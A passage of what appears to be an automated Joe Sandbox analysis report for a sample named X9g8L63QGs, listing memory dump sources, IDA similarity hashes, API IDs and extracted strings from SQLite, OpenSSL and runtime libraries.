• Associated: 00000007.00000002.1712903325.00007FFB0C183000.00000040.00000001.01000000.0000000C.sdmp
• Associated: 00000007.00000002.1712903325.00007FFB0C198000.00000040.00000001.01000000.0000000C.sdmp
• Associated: 00000007.00000002.1713147144.00007FFB0C19A000.00000080.00000001.01000000.0000000C.sdmp
• Associated: 00000007.00000002.1713182254.00007FFB0C19C000.00000004.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_7ffb0c020000_X9g8L63QGs.jbxd
Similarity
• API ID: 00007C263010
• String ID: $%!.15g$-
• API String ID: 3122504284-875264902
• Opcode ID: 312380605faac612b932c0e84749a71c5b5db630570bc0cb0ad3afdeeff4af52
• Instruction ID: 69d4ca6ac5c02b4a63b4f1d67a6d5c4e46484afd8992e8a8143ca75968f19bb2
• Opcode Fuzzy Hash: 312380605faac612b932c0e84749a71c5b5db630570bc0cb0ad3afdeeff4af52
• Instruction Fuzzy Hash: D84103E2A1C79687EB10CB3EE055BAABBA0EF85784F004135EA8E47796DB3DD405C740
APIs
Strings
Memory Dump Source
• Source File: 00000007.00000002.1715692326.00007FFB1C251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFB1C250000, based on PE: true
• Associated: 00000007.00000002.1715650944.00007FFB1C250000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1715735925.00007FFB1C264000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1715777428.00007FFB1C269000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1715818880.00007FFB1C26A000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_7ffb1c250000_X9g8L63QGs.jbxd
Similarity
• API ID: NameName::
• String ID: %lf
• API String ID: 1333004437-2891890143
• Opcode ID: 96db185dee724ff1af179d5801cdaf6ae824addfb7b5e3897bc050de27ca576d
• Instruction ID: 8c42969d5d7a6ddcf243fc979b12e1bab5e4c5d7fc94946b7cd5c011f8e7e334
• Opcode Fuzzy Hash: 96db185dee724ff1af179d5801cdaf6ae824addfb7b5e3897bc050de27ca576d
• Instruction Fuzzy Hash: 9131C8E1B08F9686E610FB75E8580FA6352BF477A0F644132E94E43351DE3CE942C380
APIs
Strings
Memory Dump Source
• Source File: 00000007.00000002.1714967826.00007FFB1B6F1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00007FFB1B6F0000, based on PE: true
• Associated: 00000007.00000002.1714933150.00007FFB1B6F0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000007.00000002.1714967826.00007FFB1B708000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000007.00000002.1714967826.00007FFB1B710000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000007.00000002.1715084541.00007FFB1B712000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000007.00000002.1715123647.00007FFB1B714000.00000004.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_7ffb1b6f0000_X9g8L63QGs.jbxd
Similarity
• API ID: String$AllocFree
• String ID: String too long for BSTR$unicode string expected instead of %s instance
• API String ID: 344208780-178309214
                                                                                                                                                                                                                                                                    • Opcode ID: 333dcf3fb14b4492ca0ae43436d3c775c4d9729a31c5a973eee24abc849743e6
                                                                                                                                                                                                                                                                    • Instruction ID: ed128f87e938ae831b86faf5a6e716e00b394d9ea2c1a97a5c02e4b9aef5375b
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 333dcf3fb14b4492ca0ae43436d3c775c4d9729a31c5a973eee24abc849743e6
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7A21E9A5A09F4281EF548B76FC541386762AF9AFE0F14E036E94E43B34DE3CE4988300
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                      • Part of subcall function 00007FFB1C255508: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FFB1C25108E), ref: 00007FFB1C255516
                                                                                                                                                                                                                                                                    • terminate.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFB1C25112E
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1715692326.00007FFB1C251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFB1C250000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715650944.00007FFB1C250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715735925.00007FFB1C264000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715777428.00007FFB1C269000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715818880.00007FFB1C26A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ffb1c250000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: abortterminate
                                                                                                                                                                                                                                                                    • String ID: MOC$RCC$csm
                                                                                                                                                                                                                                                                    • API String ID: 661698970-2671469338
                                                                                                                                                                                                                                                                    • Opcode ID: 1e1d061888eb5ed8958d1a3f543fee4a516cb38e8faaed4a66704169c3245728
                                                                                                                                                                                                                                                                    • Instruction ID: 37f027a5dfa13a7d727593ae4a4363ae1fa1fb355954d1f73298aefda2580976
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1e1d061888eb5ed8958d1a3f543fee4a516cb38e8faaed4a66704169c3245728
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BBF08CF2918A0283E7507BB4E1892FE3762EF49B61F299070C74842366CF3CD890C780
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1712903325.00007FFB0C021000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFB0C020000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712866038.00007FFB0C020000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712903325.00007FFB0C181000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712903325.00007FFB0C183000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712903325.00007FFB0C198000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1713147144.00007FFB0C19A000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1713182254.00007FFB0C19C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ffb0c020000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: 00007C263010
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 3122504284-0
                                                                                                                                                                                                                                                                    • Opcode ID: 1485575833ac080eba873b396e4fec7d0adbbe42a312c587b8f7937f0ac7c60a
                                                                                                                                                                                                                                                                    • Instruction ID: 975df3d2382b3619ca62800f4c4987bb0e04a1ab0cc6c12c182a85d40250b76b
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1485575833ac080eba873b396e4fec7d0adbbe42a312c587b8f7937f0ac7c60a
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AD91BFF1B09B468AEA659F32D558A6923A0FF44BA0F495234EE6D077C5EF3CE410C708
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1715692326.00007FFB1C251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFB1C250000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715650944.00007FFB1C250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715735925.00007FFB1C264000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715777428.00007FFB1C269000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715818880.00007FFB1C26A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ffb1c250000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Name::operator+
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 2943138195-0
                                                                                                                                                                                                                                                                    • Opcode ID: 21ceaebb6340b33c2880b1d94455a3a587ac808d2dbe1c8140b81e3c0e4e29dc
                                                                                                                                                                                                                                                                    • Instruction ID: 56ead7670d37914fc795e9190fb6140aee321805e8a7f442711531f2ca6a7d68
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 21ceaebb6340b33c2880b1d94455a3a587ac808d2dbe1c8140b81e3c0e4e29dc
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 86913DE2E08EA28AFB10AB74D8483ED2762BB06768F644035DE4D17795DFBD9845C390
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1715692326.00007FFB1C251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFB1C250000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715650944.00007FFB1C250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715735925.00007FFB1C264000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715777428.00007FFB1C269000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715818880.00007FFB1C26A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ffb1c250000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Name::operator+
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 2943138195-0
                                                                                                                                                                                                                                                                    • Opcode ID: 0bd3be82ad391ae9cd5c01d857b5e8d25ae8efb4ad2905c542e999dede7c0f10
                                                                                                                                                                                                                                                                    • Instruction ID: a6bc64c2a445d522418e96c2a8ab616c2cb56755342b4e33dd3a9983df2cf87c
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0bd3be82ad391ae9cd5c01d857b5e8d25ae8efb4ad2905c542e999dede7c0f10
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 714168F2E04B818AE7019F74D4483ED37A1BB49B68F648025DE4C57749DF789840C790
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1712903325.00007FFB0C021000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFB0C020000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712866038.00007FFB0C020000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712903325.00007FFB0C181000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712903325.00007FFB0C183000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712903325.00007FFB0C198000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1713182254.00007FFB0C19C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ffb0c020000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: 00007C263010
                                                                                                                                                                                                                                                                    • String ID: out of memory$string or blob too big
                                                                                                                                                                                                                                                                    • API String ID: 3122504284-2410398255
                                                                                                                                                                                                                                                                    • Opcode ID: 5fff3d06d0ccca3e7037c2f42f265a36d380444e00bc8815e5caa4a52cafd409
                                                                                                                                                                                                                                                                    • Instruction ID: cecfcac92f20145e1cfa9448ec2e9c97219fb33c32109cf356eb86edda264a28
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5fff3d06d0ccca3e7037c2f42f265a36d380444e00bc8815e5caa4a52cafd409
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F7C1B1E2B0875287FB259A35C288A7E67A0EF11B84F144436CB4E57795FF2CE845C318
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1715481605.00007FFB1BB11000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00007FFB1BB10000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715437200.00007FFB1BB10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715481605.00007FFB1BB25000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715572310.00007FFB1BB26000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715611009.00007FFB1BB28000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ffb1bb10000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: 00007
                                                                                                                                                                                                                                                                    • String ID: %d work, %d block, ratio %5.2f$Q2"e
                                                                                                                                                                                                                                                                    • API String ID: 3568877910-1389944727
                                                                                                                                                                                                                                                                    • Opcode ID: 5e4d09ab0390b8399ab1d5fcd6f54b8213f7fb7fffd6cb6208b0b3ac3218876c
                                                                                                                                                                                                                                                                    • Instruction ID: 55ade5ea2dc760d7d5efb2b0dbf877018f5b8af1e69ce87abcdd1fd74fbe3d52
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5e4d09ab0390b8399ab1d5fcd6f54b8213f7fb7fffd6cb6208b0b3ac3218876c
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EDA1C3B6618A81C7D7298F29F01077E7BA5FB85794F04A235DA5E43BA8CB38E505CB00
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1712903325.00007FFB0C021000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFB0C020000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712866038.00007FFB0C020000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712903325.00007FFB0C181000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712903325.00007FFB0C183000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712903325.00007FFB0C198000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1713147144.00007FFB0C19A000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1713182254.00007FFB0C19C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ffb0c020000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: 00007C263010
                                                                                                                                                                                                                                                                    • String ID: string or blob too big
                                                                                                                                                                                                                                                                    • API String ID: 3122504284-2803948771
                                                                                                                                                                                                                                                                    • Opcode ID: 6a3b792af28c5662f73222d4b4933a8ca5c4e6cb800e1e0a16e3037f37ecc6fe
                                                                                                                                                                                                                                                                    • Instruction ID: f5d2f77db95db668f27711f45de61909337c8d3ecbf45f059163e5835fe32f8e
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6a3b792af28c5662f73222d4b4933a8ca5c4e6cb800e1e0a16e3037f37ecc6fe
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4491ACE1F0820285FB689B25D458BBA67A4EF88B98F044135DE9D073D2EF3DE945C748
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1712903325.00007FFB0C021000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFB0C020000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712866038.00007FFB0C020000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712903325.00007FFB0C181000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712903325.00007FFB0C183000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712903325.00007FFB0C198000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1713147144.00007FFB0C19A000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1713182254.00007FFB0C19C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ffb0c020000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: 00007C263010
                                                                                                                                                                                                                                                                    • String ID: too many SQL variables$variable number must be between ?1 and ?%d
                                                                                                                                                                                                                                                                    • API String ID: 3122504284-515162456
                                                                                                                                                                                                                                                                    • Opcode ID: 506eda038b74c98e54bdfa24872a0cb727f6532326f914921bbb369657e19773
                                                                                                                                                                                                                                                                    • Instruction ID: cb625a1a1f8c92a0478605f4c5311d3e6dbd6e297b5e2375859669110e52d6bf
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 506eda038b74c98e54bdfa24872a0cb727f6532326f914921bbb369657e19773
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8D819AF2B08752C9EA619F21E448BB977A5FF44B84F598036EA8C47284EF38E541C308
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1712903325.00007FFB0C021000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFB0C020000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712866038.00007FFB0C020000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712903325.00007FFB0C181000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712903325.00007FFB0C183000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712903325.00007FFB0C198000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1713147144.00007FFB0C19A000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1713182254.00007FFB0C19C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ffb0c020000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: 00007C263010
                                                                                                                                                                                                                                                                    • String ID: BINARY$no such collation sequence: %s
• API String ID: 3122504284-2451720372
• Opcode ID: 282f0509ea81868ca59e037c5a34fc49bde5b1738b0b20af94cc3273fb71deb0
• Instruction ID: 9c4ab41a8ac97f708fdc05809a0dddab3ad7bedafa8b1d5f7d58ee07ec387506
• Opcode Fuzzy Hash: 282f0509ea81868ca59e037c5a34fc49bde5b1738b0b20af94cc3273fb71deb0
• Instruction Fuzzy Hash: E37192E2B08A4181EF159F31C1487B96390EF54BA4F499232DEAD07AC5EF3CE599D348

Strings
Memory Dump Source
• Source File: 00000007.00000002.1712903325.00007FFB0C021000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFB0C020000, based on PE: true
• Associated: 00000007.00000002.1712866038.00007FFB0C020000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000007.00000002.1712903325.00007FFB0C181000.00000040.00000001.01000000.0000000C.sdmp
• Associated: 00000007.00000002.1712903325.00007FFB0C183000.00000040.00000001.01000000.0000000C.sdmp
• Associated: 00000007.00000002.1712903325.00007FFB0C198000.00000040.00000001.01000000.0000000C.sdmp
• Associated: 00000007.00000002.1713147144.00007FFB0C19A000.00000080.00000001.01000000.0000000C.sdmp
• Associated: 00000007.00000002.1713182254.00007FFB0C19C000.00000004.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_7ffb0c020000_X9g8L63QGs.jbxd
Similarity
• API ID:
• String ID: index '%q'
• API String ID: 0-1628151297
• Opcode ID: 2ae049488dbcd971e8eebbb9c46ca1a513fddf04584e929c695a7bee5a319a09
• Instruction ID: 825d9b42d3e157fca775d442539225e35715b81431ba8142decb4ec58d3dc5b4
• Opcode Fuzzy Hash: 2ae049488dbcd971e8eebbb9c46ca1a513fddf04584e929c695a7bee5a319a09
• Instruction Fuzzy Hash: 8971D2F2B1865189EB10AB75D844ABC3BB0BF44B98F008635DE6E57BD4EF389445C748

APIs
Strings
Memory Dump Source
• Source File: 00000007.00000002.1712903325.00007FFB0C021000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFB0C020000, based on PE: true
• Associated: 00000007.00000002.1712866038.00007FFB0C020000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000007.00000002.1712903325.00007FFB0C181000.00000040.00000001.01000000.0000000C.sdmp
• Associated: 00000007.00000002.1712903325.00007FFB0C183000.00000040.00000001.01000000.0000000C.sdmp
• Associated: 00000007.00000002.1712903325.00007FFB0C198000.00000040.00000001.01000000.0000000C.sdmp
• Associated: 00000007.00000002.1713147144.00007FFB0C19A000.00000080.00000001.01000000.0000000C.sdmp
• Associated: 00000007.00000002.1713182254.00007FFB0C19C000.00000004.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_7ffb0c020000_X9g8L63QGs.jbxd
Similarity
• API ID: 00007C263010
• String ID: %02d
• API String ID: 3122504284-896308400
• Opcode ID: 87c9a3707543ebd0ec8a97f1e757cf13622c6e6cbfda3e3733a9ffa452fb5cd0
• Instruction ID: dc9e73f1a3e1f31b20701e14472610c8612807b741ff4d3028790c18e97cc66a
• Opcode Fuzzy Hash: 87c9a3707543ebd0ec8a97f1e757cf13622c6e6cbfda3e3733a9ffa452fb5cd0
• Instruction Fuzzy Hash: 60719EF2A1869285EB268F64E848BFD7764FF84748F504135EE8E13A59EF38E445CB04

APIs
• 00007FFB1C263010.VCRUNTIME140(?,?,?,?,?,?,00000000,00000001,00007FFB0C0BD93A,?,?,?,00007FFB0C0BDCFB), ref: 00007FFB0C0BD8A7
Strings
Memory Dump Source
• Source File: 00000007.00000002.1712903325.00007FFB0C021000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFB0C020000, based on PE: true
• Associated: 00000007.00000002.1712866038.00007FFB0C020000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000007.00000002.1712903325.00007FFB0C181000.00000040.00000001.01000000.0000000C.sdmp
• Associated: 00000007.00000002.1712903325.00007FFB0C183000.00000040.00000001.01000000.0000000C.sdmp
• Associated: 00000007.00000002.1712903325.00007FFB0C198000.00000040.00000001.01000000.0000000C.sdmp
• Associated: 00000007.00000002.1713147144.00007FFB0C19A000.00000080.00000001.01000000.0000000C.sdmp
• Associated: 00000007.00000002.1713182254.00007FFB0C19C000.00000004.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_7ffb0c020000_X9g8L63QGs.jbxd
Similarity
• API ID: 00007C263010
• String ID: CRE$INS
• API String ID: 3122504284-4116259516
• Opcode ID: 822c72113fbf7660647f9a9edbd070d2d2960cc045afc80f290bda24906f9860
• Instruction ID: dcc16ac7976ce004a085a7c9244043011cb4babd44569ffc9338a69572431056
• Opcode Fuzzy Hash: 822c72113fbf7660647f9a9edbd070d2d2960cc045afc80f290bda24906f9860
• Instruction Fuzzy Hash: 2B519AE5B09B4281EA65DB36D418AB9A3A2AF80FC4F584135DE4D47799FF3DE801C348

APIs
Strings
Memory Dump Source
• Source File: 00000007.00000002.1714746731.00007FFB1AB01000.00000040.00000001.01000000.00000012.sdmp, Offset: 00007FFB1AB00000, based on PE: true
• Associated: 00000007.00000002.1714712112.00007FFB1AB00000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000007.00000002.1714746731.00007FFB1AB0E000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000007.00000002.1714746731.00007FFB1AB11000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000007.00000002.1714860777.00007FFB1AB12000.00000080.00000001.01000000.00000012.sdmp
• Associated: 00000007.00000002.1714897323.00007FFB1AB13000.00000004.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_7ffb1ab00000_X9g8L63QGs.jbxd
Similarity
• API ID: 00007B6570
• String ID: _constructors$openssl_
• API String ID: 4069847057-3359357282
• Opcode ID: a7dc1b67828781beb12e741df7f46f6710b7391403279fd1f2b800e1e5e5bbcd
• Instruction ID: 0ebe9f7ff80ef87cd1dbc7ef6a8a754e7d44f681c8178c42b666fa09c91a1f2b
• Opcode Fuzzy Hash: a7dc1b67828781beb12e741df7f46f6710b7391403279fd1f2b800e1e5e5bbcd
• Instruction Fuzzy Hash: FD4142B990AF8381EA354B35D69867B66BABF49FA1F4440B6CD0E22755DF3CF4818301

APIs
Strings
Memory Dump Source
• Source File: 00000007.00000002.1713252916.00007FFB0C1A1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFB0C1A0000, based on PE: true
• Associated: 00000007.00000002.1713216867.00007FFB0C1A0000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.1713252916.00007FFB0C1B9000.00000040.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.1713252916.00007FFB0C1BF000.00000040.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.1713365488.00007FFB0C1C1000.00000080.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.1713399942.00007FFB0C1C3000.00000004.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_7ffb0c1a0000_X9g8L63QGs.jbxd
Similarity
• API ID: 00007C058
• String ID: COMMIT$query string is too large
• API String ID: 3574868227-2709575789
• Opcode ID: 21e30348c05b67ee3b521cb81aeeaba2193d85109b63ecd2b393586fcd8e0965
• Instruction ID: aeceaf2d4ab548e228cf6e2177d345211d4af241dd0c2a9ce514dfbddd772fb9
• Opcode Fuzzy Hash: 21e30348c05b67ee3b521cb81aeeaba2193d85109b63ecd2b393586fcd8e0965
• Instruction Fuzzy Hash: 1A418EF6A08B4286EB108B76E808A6963A1FF85FE4F180571DE5E477A4DF3DE4438700

APIs
Strings
Memory Dump Source
• Source File: 00000007.00000002.1712903325.00007FFB0C021000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFB0C020000, based on PE: true
• Associated: 00000007.00000002.1712866038.00007FFB0C020000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000007.00000002.1712903325.00007FFB0C181000.00000040.00000001.01000000.0000000C.sdmp
• Associated: 00000007.00000002.1712903325.00007FFB0C183000.00000040.00000001.01000000.0000000C.sdmp
